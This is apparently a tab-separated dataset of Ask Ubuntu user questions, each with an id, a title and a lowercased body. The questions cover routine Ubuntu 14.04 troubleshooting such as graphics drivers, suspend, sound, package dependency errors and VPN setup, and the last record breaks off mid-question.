450384	ubuntu 14.04 freeze installation	i own an hp pavilion 15 e070sl , i tried to install many linux os ( ubuntu 13.04 , 13.10 , 14.04 and fedora 20 ) alongside with windows 8.1 i'v never found one working . on 14.04 i just get a message saying that graphic card is n't detectable and so it 's going to run in minimal settings . when i hit enter another men첫 asks me how i 'm going to continue , but i ca n't select nothing , mouse is not visible and keyboard does nothing . so i press ctrl + alt + f1 and log in as root ( sudo -s ) i kill xorg and restart it with xorg.. ( tried also with xinit , same result ) i 'm now disperated cause i waited since october this new os and now i discover it 's still not supporting my laptop . here are hardware infos for my laptop . http : //h10025.www1.hp.com/ewfrf/wc/document ? docname=c03924954 & tmp_task=prodinfocategory & cc=it & dlc=it & lc=it & product=5447500
450385	using playonlinux 4.2.2 results in error message	when i do start any program in playonlinux or install additional components you get back the following message : error in pol_call function pol_install_ does not exist !
450387	screen switches off after waking up from suspend	i guess , there are plenty of duplicates of this question , but i did n't find any to be helpful in my particular problem . my story is as follows : i was running xubuntu 12.04 on a thinkpad x40 which has an intel 855gm graphics chip . on 12.04 suspend worked flawless . yesterday i upgraded to 14.04 and this broke suspend . the problem is like this : i close the lid , the laptop goes to sleep . after some time i open the lid , the screen goes on and if i 'm fast i can even start typing in the password . however some seconds later the screen switches off again , though i can hear that the system continues working . i can still switch to any tty , only x has no graphical output . if i kill x from tty , it starts again , i can login and then the system works as expected . in /var/log/xorg.0.log i see following lines : ( ii ) aiglx : suspending aiglx clients for vt switch ( ii ) aiglx : resuming aiglx clients after vt switch ( ii ) aiglx : suspending aiglx clients for vt switch which exactly fits to my observations : on lid close the screen goes off , on opening the lid it goes on and then after some seconds off again . any thoughts on how to prevent x from switching off the screen after waking up ? thanks for any input . bug reported : https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/1310038 as somebody pointed out in an answer that seems deleted now , a workaround is to switch off light locker .
450389	synaptic loading/running slowly	synaptic has been running extremely slow lately , it 's been taking ages to start up and goes dark ( what an program does when it 's not responding ) . after installing stuff , it goes dark again , and usually crashes . another thing i realised is when marking packages , when a dialog box comes up saying something like : `` these other packages will be installed as well cause the package you wan na install depends on them '' , each package renames and turns into a list of all the packages in alphabetical descending order until i put my moues over one and it turns back to its original name : example : does anyone know what this is cause by or how to fix it ? thanks !
450391	ubuntu 14.04 on apple macbook air late 2010 , 3-2 - installation not possible	starting from a live usb stick , according to : create a usb stick on mac osx is not possible . i downloaded ubuntu-14.04-desktop-amd64+mac.iso the same behaviour appears with refit installed . can anybody help me ? i 'd love to get ubuntu running .
450394	amd catalyst installation	after i did a clean install of ubuntu 14.04 i ca n't install catalyst . when i try to install the driver it displays an error that there is no compatible adapter . i tried it with the stable and the beta driver . any clues ? thanks , leo .
450395	parted rescue - how to discover start\end for deleted partition	in order to use rescue command in parted you need the start and end block numbers of the deleted partition . however , if the partition is gone parted 's print command wo n't give you those . how can you discover the start\end block numbers ? is there a way to go ahead and perform the rescue attempt without them ?
450398	how to remove `` amazon '' ?	i wanted to remove `` amazon '' from my 14.04 and tried to follow the instructions given here : how can i remove amazon search results from the dash or disable the feature ? however , even after logging off and loggin back in , i see that i get the updates to `` amazon '' : '' online search results '' have been disabled in security and privacy settings . i even tried to remove it from the software center by using the button provided in the above question which says there is no package named unity-lens-shopping . and if i again try to remove unity-lens-shopping from the terminal using sudo apt-get remove unity-lens-shopping , unity-lens-home is selected and nothing is actually removed and i get the following output : reading package lists ... done building dependency tree reading state information ... done note , selecting 'unity-scope-home ' instead of 'unity-lens-shopping' 0 upgraded , 0 newly installed , 0 to remove and 29 not upgraded . i just ignore the 29 packages to be upgraded , for now , should be unrelated ( ? ) trying to remove unity-lens-home i get a e : unable to locate package unity-lens-home error . how do i completely remove the shopping app from 14.04 to stop receiving updates for this application ?
450399	acer_wmi : unable to find wmid devices - ubuntu 14.04	on acer aspire 5532 after installation getting on boot message : acer_wmi : unable to find wmid devices laptop is working well , but why not to fix this . any help to fix it ( not to cover ) would be very welcome .
450400	install lubuntu 14.04 lts on a non-pae processor	how can i install lubuntu 14.04 lts on a non-pae processor ? if it 's not possible . is there a work around for how to do it ? it should be possible . lubuntu is very low in system resources and perfect for old machines with a non-pae processor .
450403	terminal fails to connect to my shcool 's wifi	i am trying to connect to wi-fi of my school . it connects to internet , and i am able to run it on firefox but it fails to work on terminal . i get these outcomes : kadir @ kadir : ~ $ sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' wits-wifi '' mode : managed frequency:2.462 ghz access point : 70:52 : c5:9a : d2 : f0 bit rate=52 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=46/70 signal level=-64 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:2 invalid misc:130557 missed beacon:0 kadir @ kadir : ~ $ sudo apt-get update 0 % [ connecting to archive.ubuntu.com ( 91.189.88.150 ) ] [ connecting to archive.ca and stops there..
450405	installing mysql workbench on ubuntu 14.04	i have installed mariadb as its supported by ubuntu community , mentioned in release note of latest lts . after that i tried to install mariadb-client , that too installed successfully , after that its good to have gui tool so decided to install mysql-workbench from both ubuntu-software-center and via terminal but it prompted errors mentioned below- error via ubuntu-software-center- this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . mysql-workbench : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libgtkmm-2.4-1c2a ( > = 1:2.24.0 ) but 1:2.24.4-1ubuntu1 is to be installed depends : libpcrecpp0 ( > = 7.7 ) but 1:8.31-2ubuntu2 is to be installed depends : python : any ( > = 2.7.1-0ubuntu2 ) but it is a virtual package depends : mysql-workbench-data ( = 6.0.8+dfsg-2 ) but 6.0.8+dfsg-2 is to be installed . error via terminal- the following packages have unmet dependencies : mysql-workbench : depends : mysql-client e : unable to correct problems , you have held broken packages . this one has become confirmed bug on launchpad as mentioned here . on the official website of my-sql , the versions of workbench are only available till saucy ( 13.10 ) , so how can i install it . update 1 added the following lines in /etc/apt/sources.list # mariadb 10.0 repository list - created 2014-04-19 11:47 utc # http : //mariadb.org/mariadb/repositories/ deb http : //mirror.mephi.ru/mariadb/repo/10.0/ubuntu trusty main deb-src http : //mirror.mephi.ru/mariadb/repo/10.0/ubuntu trusty main no change , still same issue . there is some problems between trusty and version 10.1.10 of mariadb . so tried sudo apt-get install libmysqlclient18=10.1.10-mariadb1~trusty mysql-common=10.1.10-mariadb1~trusty and its output is - e : version '10.1.10-mariadb1~trusty ' for 'libmysqlclient18 ' was not found e : version '10.1.10-mariadb1~trusty ' for 'mysql-common ' was not found so the thing is simple it could not find it . though its there on the official website . update 2 removed mariadb 10.1.10 , but the problem is still same with mariadb 5.5.37 .
450406	run javascript function ( inside a web ) with an unity launcher quicklist action	a web has an internal javascript function triggered by a click into a link ( there is not a direct url ) < a href= '' '' onclick= '' showcontacts ( ) '' > contacts < /a > i want a launcher quicklist action which call that function showcontacts ( ) . something like this : unity.launcher.addaction ( `` contacts '' , function ( ) { document. < i 'm lost here > .click ( ) ; } ) ; thanks in advance !
450410	how can i disable ati discrete graphic gpu at startup in ubuntu 14.04 without bios ?	i could disable ati discrete graphics in ubuntu 13.10 with this command : echo off > /sys/kernel/debug/vgaswitcheroo/switch but in ubuntu 14.04 it does not work . cat /sys/kernel/debug/vgaswitcheroo/switch shows the same : 0 : igd : + : dynpwr:0000:01:05.0 1 : dis-audio : : pwr:0000:02:00.1 2 : dis : : dynpwr:0000:02:00.0 what should i do in ubuntu 14.04 ?
450411	installed ubuntu 14.04 a day later sound is disabled	screenshot at bottom . hi , so i upgraded my dell xps13 to 14.0f4 and everything went smoothly . today when i was just checking out the new os my sound disappeared ? the menu bar say volume is muted , sound panel in settings shows it is unmuted but no hardware is detected . i can adjust the volume and mute in settings but there is obviously no change . the menu bar and keyboard keys for volume are completely unresponsive . i followed the instructions here , have rebooted the machine and pulseaudio , individually https : //bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/946232/comments/32 unfortunately to no avail , anyone else ? similiar problem ? i also seem to have lost about half of my icons after looking at themes in unity tweak , despite not changing the theme . perhaps related ? does n't make sense to me , even the default icon set does n't seem to show icons anymore for some programs ie . settings , gedit , .pdfs , etc . i do n't see why they would be connected but who knows . i noticed the problems around the same time . screenshot http : //i.stack.imgur.com/g4pyl.png
450412	ubuntu 14.04 - libreoffice writer does n't have visible minimize , maximize and close buttons	window menu for libreoffice writer is locked under unity global menu bar . if i go in system settings → appearance → behavior and i checked `` show the menu for a window in the window 's title bar '' then no menu is visible for libreoffice writer . also the libreoffice writer 's window can not be dragged with mouse from the global menu . what should i do to solve these problems : unlock the office menu ( to have visible minimize , maximize and close buttons ) and to be able to drag the window ? thank you .
450420	will ubuntu 14.04 dvds be available for buying in canonical store ?	times ago , canonical announced that in the canonical store will be available for buying only cds / dvds of lts releases : canonical axe ubuntu discs for non-lts releases but , now we have ubuntu 14.04 lts and no dvd available in the store : cds or dvds of the distributions in bulk they added only a t-shirt . anyone knows why , and if dvds will be available in future for buying ? ps : i know that it 's not really useful that i 'm going to burn download iso , but i like to have original ubuntu disks : ) *
450424	lubuntu 14.04 does not detect hybrid graphics ( intel/nvidia )	i have been trying different solutions for lubuntu 14.04 to detect my hybrid nvidia graphics card but to no result . i am using a dell latitude 6410 laptop with intel hd and an nvidia nvs 3100m @ 512mb gddr3 , and in the system profiler the opengl renderer entry says unknown . my lspci | grep -i vga output in terminal is : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) i also tried adding the xorg-edgers ppa as suggested here , but the command ubuntu-drivers devices yields no output at all . i 'm thinking of trying bumblebee , but i do n't know whether it will be of any use if the nvidia video card is not detected .
450427	how enable unity again ?	after installing ubuntu 14.04 i installed compizconfig-settings-manager . then i made a mistake and disabled the unity plugin . after that unity ( the dash and panel ... ) are gone . i ca n't even run the terminal now . what should i do ? how can i restore or reset it ?
450428	how to get write permission on /etc/environment ?	i want to add mysql connector jar file to classpath and by browsing through the net . i read that a global way to do it is to update the /etc/enviroment but the file opens as readonly . what i do n't get is that i am the only one with the account and the terminal does show ' $ ' so how do i get write permission on /etc/environment ? if there is some-other way to fix the issue that i am facing -- ( issue : com.mysql.driver not found in classpath ) -- feel free to share it with me . i encountered this when setting up bamboo -- but i do n't know if that 's relevant so you might skip the last line and provide the solution . thank you in advance .
450429	grub install error during installing ubuntu 14.04 alongside windows 8.1	few days back i had tried to install ubuntu 14.04 on my windows 8.1 laptop ( factory installed ) .the installation ended but when the system restarted then the boot menu just showed the grub boot menu.it did n't load the windows boot loader.i think it was due to wrong boot loader option selected but then i tried to re install ubuntu and this time it showed : executing 'grub-install/dev/sda ' failed . this is a fatal error . isnt there a way by which i can install it again from clean without affecting my windows boot loader settings ? ? ?
450432	software-center not finding software that is present in repository	i like a certain software . it is called 'full gnome desktop environment , with extra components ' . i can find it in software-center when i type 'gnome ' and select 'by relevance ' or even 'top rated ' . it happens to be the first found software : then i created a vm using the same 14.04.iso file ; and when i go to the vm software-center and type the same 'gnome ' string into the search field i can not find the software i want . look : question : how do i find the desired software in the vm 's software-center ? is there some option i need to check off ? ? i already tried to search 'gnome ' , 'gnome ' and went up and down the entire list . any suggestions on how to find the software i am looking for , that i know is available on the repository ? thanks , mike
450434	libreoffice does n't support copy from calc and paste in writer	when i try to copy fields from calc to writer in libre the office application is getting terminated . need help on resolving this issue . i am currently on 14.04lts .
450435	how to move/resize window by tapping/dragging on the touchpad on 14.04 ?	i have a dell xps 13 developers edition that came with ubuntu 12.04 pre-installed . in 12.04 , i was able to move and resize windows by tapping/dragging on the touchpad with three fingers . yesterday , i upgraded my laptop to 14.04 and this feature is not available anymore . is it possible to get it back ? two-finger scrolling still works in 14.04 .
450436	how to use live meeting on ubuntu	i am attending this online english course that only works with microsoft live meeting . i bought a new laptop since i will be in germany for the next three months ( i am italian ) and i installed ubuntu as software , i do not want to give up on the course just because of this small detail , could someone tell me how to make live meeting run on my computer ?
450437	ubuntu 14.04 - brightness problem in hp hybrid laptop	in a hp sleekbook 15 laptop i managed to install nvidia driver and also quick switch graphics is working . when nvidia card is active i can adjust the brightness using keyboard but when intel card is active the adjust is not possible . i have to mention that i have followed next advice `` edit /usr/share/x11/xorg.conf.d/20-intel.conf as root . enter the following text : section `` device '' identifier `` card0 '' driver `` intel '' option `` backlight '' `` intel_backlight '' busid `` pci:0:2:0 '' endsection `` but still doesnt work for intel graphic card . someone can help ? thank you !
450438	is there a database with all default configuration files for each release ?	i would like to see each configuration file in /etc for all packages , so i can compare the default configuration of one ubuntu release with the next one . i need this to find a solution for the suggestion to enhance the upgrade process here : the process of upgrading the system often leads to points , where you have to decide , if you want to take the default package configuration file or keep the old one ( or review this as a diff ) . these dialogs appear all at the point that these packages are installed , which can be several minutes ( or hours on slow mashines ) apart . it would be really helpful , if there would be a check at the beginning of the upgrade process , that checks if config files have to be reviewed and decisions have to be made . ( maybe as a shord dry-run , that will notice the to-be changed config files ) . if this was implemented , the user could be asked all decisions at the very beginning of the upgrade process and the actual upgrade can be done without interruption .
450439	what is gtk to gnome shell and unity	can someone tell me what exactly is gtk , genome shell , and unity in between all of those . i might sound stupid but can someone tell me how to take advantage of any of these i am using and which one am i using . currently using ubuntu 13.10 thanks in advace , quantum
450440	kazam screenrecorder 's strange behaviour in ubuntu 14.04 lts	i just upgraded my ubuntu 12.04 lts to 14.04 lts . while i record a video for 30 seconds using kazam screenrecorder , its gets saved in the video folder as usual ( now .avi format ) . but the file 's size is 3.5 gb for 30 seconds video . what is the issue in it ? [ i even tried installing kazam newly ]
450442	installing telegram issues	i want to install telegram on by ubuntu 14.04 pc . i have used the command as directed : sudo apt-get install libreadline-dev libconfig-dev libssl-dev lua5.2 liblua5.2-dev and i get this error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how do i proceed ?
450443	light locker stops background activities ( eg . music playback ) when screen is locked	i upgraded my xubuntu installation to the new release , 14.04 . this release includes a new light-locker , a great improvement if you ask me . the thing is that whenever i try to lock the session or when it locks automatically after some time , it stops ( or pause ) playback of music , for instance ( i have just noticed this while having some music played in the background on youtube ) . when i unlock the session it resumes playing instantly . i 've looked for some options in the settings , but did n't see any . also , i found this bug https : //bugs.launchpad.net/ubuntu/+source/light-locker/+bug/1296456 which if i understand correctly fixes this situation in version 1.4.0 . sadly , this is the version xubuntu 14.04 ships with , but the problem still exists . what should i do ?
450444	intel hd graphics settings	if you got any laptop has an intel cpu in last 3 years in it you have a gpu from intel such as hd graphics 1000 or 5000 , there is a program called intel hd graphics settings in windows , can you give me a replacement for that in ubuntu 14.04 lts ? ? i 'm using samsung chronos/ativbook series 7 and ca n't use my secondary tv properly , i ca n't see unity and status bar , it 's like 1920x1080 cropped into 1600x900
450448	'proto ' field in 'ip route add '	i have added two routes using : ip route add 100.100.200.0/24 via 100.100.100.1 proto 89 and a different protocol number . my question is if this 'proto ' number is same as ip protocol numbers ( i.e 89 = ospf ) or something else ? and how does linux kernel set preference for different proto numbers ? is there a way to show protocol names rather than just numbers ?
450449	ubuntu 14.04 no cursor after fresh instalation	so i 'm having a problem after installing ubuntu 14.04 on my hp pavilion dv6-3160sp . the problem is that after the booting to ubuntu the mouse/cursor simply vanishes , and also if i try like right click it does n't do anything , so it 's not `` invisible '' i think . but when i was `` trying ubuntu '' before installing i did n't find any problem , the cursor was normal . the iso that i 'm using it 's the official `` ubuntu-14.04-desktop-amd64 '' . i tested with the touchpad and a normal mouse , with no results . i tried to use the command : `` gsettings set org.gnome.settings-daemon.plugins.cursor active false '' with no results
450450	using vnc from tablet to use as second monitor/input	i 'm running this on kubuntu . so here 's what i 'm trying to do : i have an old 10 '' android tablet that 's not really good for much other than painful browsing and watching videos on . but it can access my desktop nicely through a vnc desktop sharing from my computer . rather than just duplicate my screen though , i would like to view a second x-session . this i am able to do by going to tty1 ( ctrl-alt-f1 ) and typing : startx -- :1 this then runs another x-session in tty8 that i can easily share and access from the tablet using desktop sharing/vnc . from here i would typically be looking at a spreadsheet or document while typing on the normal tty7 ( which is usually the first and only instance of x right ? ) however , all inputs from the tablet side are ignored , until i switch back to tty8 ; meaning i ca n't switch between pages of a pdf or epub or scroll down etc while busy in tty7 . i am able to use the tablet as an input device when my desktop is running in tty8 . how do i work around it ? also , in future , it would be nice to start the second x-session with the resolution of the tablet screen , but i first want to get the input issue solved .
450451	how can i get the sound output in oxford advanced learners ' dictionary 8 working ?	i 'm trying to install oald8 on ubuntu 14.04 lts 64-bit . these are the steps i took so far : $ sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 $ sudo apt-get install ia32-libs-gtk ia32-libs-sdl dpkg-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ia32-libs-gtk e : unable to locate package ia32-libs-sdl $ padsp '/home/ioannis/oald8/oald8 ' error : ld.so : object '/usr/lib/x86_64-linux-gnu/pulseaudio/libpulsedsp.so ' from ld_preload can not be preloaded ( wrong elf class : elfclass64 ) : ignored . /home/ioannis/oald8/oald8-bin : error while loading shared libraries : libpangoxft-1.0.so.0 : can not open shared object file : no such file or directory following these error messages i installed the following packages : sudo apt-get install libgtk2.0-0 : i386 gtk2-engines-murrine : i386 now the oald8 starts but i can not hear pronunciation sounds . this is the command line output i see : $ padsp '/home/ioannis/oald8/oald8 ' error : ld.so : object '/usr/lib/x86_64-linux-gnu/pulseaudio/libpulsedsp.so ' from ld_preload can not be preloaded ( wrong elf class : elfclass64 ) : ignored . gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' gtk-message : failed to load module `` canberra-gtk-module '' loadplugin : failed to initialize shared library /home/ioannis/oald8/plugins/libflashplayer.so [ libnssutil3.so.1d : can not open shared object file : no such file or directory ] loadplugin : failed to initialize shared library /home/ioannis/oald8/plugins/libflashplayer.so [ libnssutil3.so.1d : can not open shared object file : no such file or directory ] thanks in advance for any effort and time
450452	boot time increase after upgrading ubuntu 13.10 to 14.04	boot time is increased after the upgrade from 13.10 to 14.04 . i do not have any issue regarding nvidia driver ( nvidia driver re-installed after the upgrade ) and works perfect . i am using vmware and i had also re-build it after the upgrade . it is also working fine . i do not how to increase boot time . i am sure that if i perform clean installation of 14.04 it will be quicker boot time . could you please suggest me how to decrease system boot time ? defrag disk etc ...
450458	mouse cursor blink on 14.04 live on cool drive	i make my cool drive boot able and i use ubuntu 14.04 on my cool drive but my mouse cursor blinks ? even i do not run any heavy process . what is the problem ? bye the way i do not have black screen . every thing seems normal except mouse cursor which blinks
450459	how can i get rid of gpt if i want to install single boot ubuntu	i have got my new laptop and want to install ubuntu 14.04 on it ( single boot system ) from usb live disk . since my disk is less than 1 tb , i want to have legacy boot and non-gpt partition . what can i do for this ? thanks in advance .
450462	remove `` ( unregistred ) '' string from window title of sublime text 2	i 've installed sublime text 2 using this answer and is working fine . my problem is this annoying string ( unregistred ) from the window title . is there any way to remove it / change it ?
450467	ubuntu 14.04 nvidia optimus bumblebee error	i know that in ubuntu 14.04 there exists nvidia-prime for nvidia optimus , but i do n't like it and neither am i able to get it work . after upgrading from ubuntu 12.04 everything crashed , and i made a clean install of ubuntu 14.04 and bumblebee , but now i have new troubles . after running optirun glxgears i get the following error : ** [ 4703.996785 ] [ error ] can not access secondary gpu , secondary x is not active . ** ** [ 4703.996910 ] [ error ] aborting because fallback start is disabled . ** please help .
450469	how do i make the dash only show installed application without lens ?	when i click the dash icon , i want the dash only show search bar and applications i have installed.is this possible in any way ? thanks !
450473	video players do n't show up properly in web browsers	after installing ubuntu 12.04 lts , i 've noticed that sites that play videos do n't display properly . the video shows up distorted in both firefox and chromium web browsers . my desktop pc has an integrated graphics built into the motherboard . i 've installed flash player and still the video players still wo n't display properly ( e.g . youtube , blip.tv , etc. ) . my system is a gateway 310 h and has the following specs : 2 gb ddr ram 64 mb integrated graphics card pentium 4 3.06 ghz cpu ( hyper threading ) . any help would be much appreciated .
450474	can not execute executable files x.run	i use kubuntu 14 on hp envy . i 'm trying to install software ( software : mplab速 x ide v2.05 and mplab速 xc32 compiler v1.31 ) from .run files this fails . the .run files have executable flags set : -rwxr-xr-x mplabx.run* i tried : ./mplabx.run* sudo ./mplabx.run* sudo -i ... ./mplabx.run* every time the same result : nothing , the terminal just shows the folder name . i also wanted to install skype by using the dynamic version . in skypes readme is written : '' a path for skype to exist in . we recommend copying the skype binary to /usr/bin and installing sounds/ , lang/ and avatars/ into the /usr/share/skype directory . `` [ skype readme ] i did that tried to open in konsole the answer was : bash : /usr/bin/skype : no such file or directory but thats not true the file exists and is executable . i tried also sudo . what can i do do ? i have to register thos progs which should be executable ? thanks for answers ! !
450476	how do i replace the release in sources.list ?	is there an easy way to replace all instances in /etc/apt/sources.list with the new release ? i want to replace all instances of my current release ( whatever it is ) with the new release for 14.04 `` trusty ''
450478	ubuntu 12.04 lts runs slow	i am new ubuntu user . i am using ubuntu for web development . for that i have installed xampp for linux , ubuntu and chromium browser . but i dont know why it is too much slow . help is needed . thank you . my system configuration is : processor : intel pentium cpu g620 @ 2.60ghz x 2 ram : 2gb available disk space : 103gb swap : 2gb
450479	what is debconf on magic ?	it displays a message in the message tray saying `` debconf on magic is ready '' . on clicking the message , a blank window opens with title `` debconf on magic '' and after 2-4 sec it gets closed . i have just upgraded to ubuntu gnome 14.04 .
450481	how can i connect to wifi in ubuntu 14.04 with lxde ?	i have upgraded my desktop ( which runs lxde desktop environment ) . in the previous version i had a network manager icon which if i right-clicked , i could see various network options like enable wireless , list of available wifi spots , etc . now i can connect only using the terminal , there is no graphical interface . how do i fix that ?
450485	no update found in normal release for lts	i updated ubuntu , but it updated from 12.04 to 13.10 and not to 14.04 lts . now the update manager and also after running update command from terminal , it says 'no new release found ' . now i ca n't update to 14.04 lts . what to do ?
450486	how to select which application should be used by open containing folder ?	i have already read some questions and answers here and on the internet , but i was n't able to solve my problem . i think it is related to having installed both ubuntu-desktop and kubuntu-desktop . i have installed ubuntu 14.04 on my laptop and also kubuntu-desktop . i mostly use the kde sessions and hence i 'd like all default applications to use kde 's programs , at the very least when running a kde session . currently when i try to open a folder via firefox 's open containing folder ... ubuntu 's file application is launched . i 'd like to see dolphin instead . i thought that firefox used xdg-open to open external files but this does n't seem the case since : xdg-open ~ opens dolphin in a kde session . in summary : how can you specify exactly which application is used when clicking on open containing folder ... ? note 1 : i have already set dolphin as default : $ xdg-mime query default inode/directory dolphin.desktop $ cat /usr/share/applications/defaults.list | grep inode inode/directory=kde4/dolphin.desktop also in system preferences i have selected dolphin as default file manager . note 2 : i have already tried to reinstall firefox in a kde session ( hoping this would trigger some re-configuration ) : sudo apt-get remove firefox sudo apt-get purge firefox sudo apt-get install firefox this does n't change anything . note 3 : i noticed the mimeinfo.cache file which contains : cat /usr/share/applications/mimeinfo.cache.backup | grep inode inode/directory=nautilus-folder-handler.desktop ; baobab.desktop ; kde4-dolphin.desktop ; kde4-gwenview.desktop ; kde4-kdesvn.desktop ; nautilus.desktop ; however i have tried mving it ( and restarting ) , but nothing changed . i have tried to replace the above line with : inode/directory=kde4-dolphin.desktop ; kde4-gwenview.desktop ; kde4-kdesvn.desktop ; nautilus.desktop ; but nothing changed .
450487	using .apk files on ubuntu	i wanted to know if .apk files xan be reverse compiled to get source code and then be recompiled for x86 platform to make it work on an ubuntu or windows system ? related question : can i run android apps on ubuntu ?
450489	pulseaudio card-profile for focusrite scarlett 18i8	this is my first question here and i 'm not quite sure what data to include for this question . please ask me if you need me to provide more information . i recently got the focusrite scarlett 18i8 audiointerface . it 's working really great in my daw so far ( using alsa and manual channel assignment ) , but there is one annoying thing left : pulseaudio is recognizing the device as 7.1 output but the 18i8 has 4 stereo outputs ! therefore vlc ( and other apps ) is playing movies in 7.1 mode and not stereo as it should . i 've googled around a bit and saw some things about pulseaudio card-profiles and the pactl and pacmd commands . thats why i tried : pactl set-card-profile 3 output : analog-stereo but it returns ( translated by me ) : failure : no such entity a look into pacmd list-cards tells why : 4 card ( s ) available . ... index : 3 name : < alsa_card.usb-focusrite_scarlett_18i8_usb_1000657a-00-usb > driver : < module-alsa-card.c > owner module : 8 properties : alsa.card = `` 3 '' alsa.card_name = `` scarlett 18i8 usb '' alsa.long_card_name = `` focusrite scarlett 18i8 usb at usb-0000:00:1d.0-1.2 , high speed '' alsa.driver_name = `` snd_usb_audio '' device.bus_path = `` pci-0000:00:1d.0-usb-0:1.2:1.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/sound/card3 '' udev.id = `` usb-focusrite_scarlett_18i8_usb_1000657a-00-usb '' device.bus = `` usb '' device.vendor.id = `` 1235 '' device.vendor.name = `` novation ems '' device.product.id = `` 8014 '' device.product.name = `` scarlett 18i8 usb '' device.serial = `` focusrite_scarlett_18i8_usb_1000657a '' device.string = `` 3 '' device.description = `` scarlett 18i8 usb '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-usb '' profiles : output : analog-surround-71 : analog surround 7.1 ausgang ( priority 700 , available : unknown ) off : aus ( priority 0 , available : unknown ) active profile : < output : analog-surround-71 > sinks : alsa_output.usb-focusrite_scarlett_18i8_usb_1000657a-00-usb.analog-surround-71/ # 2 : scarlett 18i8 usb analog surround 7.1 sources : alsa_output.usb-focusrite_scarlett_18i8_usb_1000657a-00-usb.analog-surround-71.monitor/ # 4 : monitor of scarlett 18i8 usb analog surround 7.1 ports : analog-output : analoge ausgabe ( priority 9900 , latency offset 0 usec , available : unknown ) properties : the only profile available for this device is the analog-surround-71 , but aplay lists all kinds of modes : user @ userbuntu : ~ $ aplay -l ... sysdefault : card=usb scarlett 18i8 usb , usb audio default audio device front : card=usb , dev=0 scarlett 18i8 usb , usb audio front speakers surround40 : card=usb , dev=0 scarlett 18i8 usb , usb audio 4.0 surround output to front and rear speakers surround41 : card=usb , dev=0 scarlett 18i8 usb , usb audio 4.1 surround output to front , rear and subwoofer speakers surround50 : card=usb , dev=0 scarlett 18i8 usb , usb audio 5.0 surround output to front , center and rear speakers surround51 : card=usb , dev=0 scarlett 18i8 usb , usb audio 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=usb , dev=0 scarlett 18i8 usb , usb audio 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=usb , dev=0 scarlett 18i8 usb , usb audio iec958 ( s/pdif ) digital audio output dmix : card=usb , dev=0 scarlett 18i8 usb , usb audio direct sample mixing device dsnoop : card=usb , dev=0 scarlett 18i8 usb , usb audio direct sample snooping device hw : card=usb , dev=0 scarlett 18i8 usb , usb audio direct hardware device without any conversions plughw : card=usb , dev=0 scarlett 18i8 usb , usb audio hardware device with all software conversions so here is my question : is it possible to manually add a pulseaudio-profile or do i need to change anything deeper in alsa ? if so , could anybody tell me how ? thanks in advance !
450493	openvpn ca n't import configurations on new 14.04 installation	i installed the openvpn network manager by doing : sudo apt-get install network-manager-openvpn , which also installs the gnome package . this made it possible to import configurations under 13.10 , but on my fresh installation , i can point to the .conf files , but after clicking import , the manager just dissapears and no connection is added . i tried manually setting it up , which kind of worked , but my connection keeps dropping after a while , i guess because i did n't manually set every last detail of the very detailed configuration . connecting through the terminal by doing : sudo openvpn -- config /path/to/openvpn.conf asked me for a username , then password , but then does n't connect . what can i do to fix this ? i really need my vpn , any help is deeply appreciated ! this is a freshly downloaded configuration which should work just fine ... edit : here 's the error message : https : //i.imgur.com/rhf8zyb.png edit2 : damnit , it 's a bug : https : //bugs.launchpad.net/ubuntu/+source/network-manager-openvpn/+bug/1294899 this is really sad : ( hope it can get fixed soon ...
450496	what happens when we cancel apt-get install manually or due to network failure	hi today i was installing mongodb using apt-get its 114 mb download , when apt-get was running i lost network connection so downloading stopped so cancelled it using ctrl + c . later when my connection resumed i started apt-get install again but this time it showed it needs to downloadd 109 mb instead of 114 mb , but this time too my internet connection was slow so i cancelled it using ctrl + c . so my question is how does apt-get work ? what happens to data downloaded if there is network error or users cancels installation ? do i need to clean previous incomplete downloads before trying to install again ? how do i resume installation again ? ? how do i start a clean installation ? pls help
450498	missing opencl.so file / no gpu found	i am having trouble trying to get my graphic card to be recognised , not just recognised , but for it being able make use of it 's opencl/gl drivers for use in gaming mostly and bitcoin mining . i have asus n56vz running linux mint 16 ( petra ) ( cinnamon ) , was n't too sure if it be suitable to post about linux mint here , but linux mint and ubuntu are n't all that too different from each other , issue happens on either systems . that one annoying problem i ca n't seem to find the answer to after searching the internet , bitcoin miner is unable to find the gpu or cpu built-in to the system . giving me that no gpu detected and the could not find libopencl.so . * linux asus 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux now before coming posting my question here i did read over this topic here âť open cl in intel , i followed that and got intel cpu/gpu to be detected properly in bitminter , just not my secondary built-in graphics card which is nvidia geforce gt 630m . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 630m ] ( rev ff ) they seem to be detected correctly by the system , but they do n't recognise when it comes to cpu/gpu computing for bitminter for bitcoin mining . also i do notice in playing games too that the graphics drivers are n't working as it should be . for some games they work just fine , but for some other games i get black textured graphics , or even white textured graphics , really bit confused why it says they are being detected yet they do n't function as they should be doing normally for other stuff . after running a test here 's my output for intel hd graphics using the beignet to test for the opencl driver . number of available platforms : 1 platform names : [ 0 ] experiment intel gen ocl driver [ selected ] number of devices available for each type : cl_device_type_cpu : 0 cl_device_type_gpu : 1 cl_device_type_accelerator : 0 *** detailed information for each device *** cl_device_type_gpu [ 0 ] cl_device_name : intel hd 